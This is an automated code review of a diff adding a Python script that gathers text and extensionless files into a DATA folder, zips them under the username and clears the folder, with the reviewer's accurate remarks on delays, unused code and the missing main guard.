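Review bot: `set USERNAME=%USERNAME%` assigns the variable to itself and can be dropped together with the comment above it. The last two `echo` lines report the same file twice; keep one. `dism /online /get-features` is likely to need an elevated prompt (inferred, not shown here), and a failure would be redirected into the output file unnoticed; `if errorlevel 1 echo ERROR: dism failed` after the redirect would surface it.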
@@ -0,0 +1,128 @@ +from datetime import datetime +import getpass +import os +import shutil +import time +import zipfile + +USER_NAME = getpass.getuser() +DESTINATION_PREFIX = "DATA\\" + USER_NAME + + +def zip_data_folder(): + # Define the source folder and the destination zip file + source_folder = "DATA" + destination_zip = f"{USER_NAME}_data.zip" + + # Check if the source folder exists + if not os.path.exists(source_folder): + print(f"ERROR: The folder {source_folder} does not exist.") + print() + return + + # Create a ZipFile object + with zipfile.ZipFile(destination_zip, 'w', zipfile.ZIP_DEFLATED) as zipf: + # Iterate over all the files in the source folder + for root, dirs, files in os.walk(source_folder): + for file in files: + # Construct the full file path + file_path = os.path.join(root, file) + # Add the file to the zip + zipf.write(file_path, os.path.relpath(file_path, source_folder)) + + print(f"INFO: Folder {source_folder} has been zipped into {destination_zip}.") + print() + + +def process_files(): + # Define the current working directory and the DATA directory + current_dir = os.getcwd() + data_dir = os.path.join(current_dir, 'DATA') + + # Ensure the DATA directory exists, if not, create it + if not os.path.exists(data_dir): + os.makedirs(data_dir) + + # List all items in the current directory + items = os.listdir(current_dir) + + # Filter items that are files with.txt,.file extensions or no extension + target_files = [item for item in items if + item.endswith('.txt') or item.endswith('.file') or not os.path.splitext(item)[1]] + + if target_files: + print(f"INFO: Found {len(target_files)} files to process.") + print() + for item in target_files: + # Construct the full path to the item + item_path = os.path.join(current_dir, item) + + # Check if the item is a file before attempting to copy + if os.path.isfile(item_path): + # Copy the file to the DATA directory + shutil.copy(item_path, data_dir) + + # Delete the original file + os.remove(item_path) + + 
print(f"INFO: Processed {item}, copied to {data_dir} and deleted.") + print() + else: + print(f"INFO: Skipping {item} as it is not a file (it might be a directory).") + print() + else: + print("WARNING: No.txt,.file files or files without extensions found in the current directory.") + print() + + +def empty_data_folder(): + # Get the current working directory + current_dir = os.getcwd() + + # Define the folder name to search for + folder_name = "DATA" + + # Construct the path to the folder + folder_path = os.path.join(current_dir, folder_name) + + # Check if the folder exists + if os.path.exists(folder_path): + # Check if the folder is a directory + if os.path.isdir(folder_path): + # List all files and directories in the folder + for item in os.listdir(folder_path): + # Construct the full path to the item + item_path = os.path.join(folder_path, item) + + # Check if the item is a file or directory + if os.path.isfile(item_path): + # Remove the file + os.remove(item_path) + elif os.path.isdir(item_path): + # Remove the directory and its contents + shutil.rmtree(item_path) + + else: + print(f"ERROR: The folder '{folder_name}' does not exist in the current working directory.") + + +def get_current_datetime(): + # Get the current date and time + now = datetime.now() + + # Format the date and time + formatted_now = now.strftime("%Y-%m-%d %H:%M:%S") + + return formatted_now + + +process_files() +time.sleep(6) +zip_data_folder() +print("INFO: Finished, Closing in 3 seconds...") +print() +time.sleep(6) +empty_data_folder() +current_datetime = get_current_datetime() +print("SYSTEM: Project Complete: ", current_datetime) +print()
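Review bot: The module-level sequence prints `"INFO: Finished, Closing in 3 seconds..."` and then runs `time.sleep(6)`, and there is a second unexplained `time.sleep(6)` between `process_files()` and `zip_data_folder()`; make the message and delay agree (e.g. `CLOSE_DELAY_SECONDS = 3`) and comment why the first pause exists. In `empty_data_folder`, the inner `if os.path.isdir(folder_path):` has no `else`, so a plain file named `DATA` leaves the function silent while the outer `else` reports a missing folder. `DESTINATION_PREFIX` is unused, and the `shutil.copy` + `os.remove` pair in `process_files` is what `shutil.move(item_path, data_dir)` does in one step. The whole run happens at import time; an `if __name__ == "__main__":` guard would match Voyager.py.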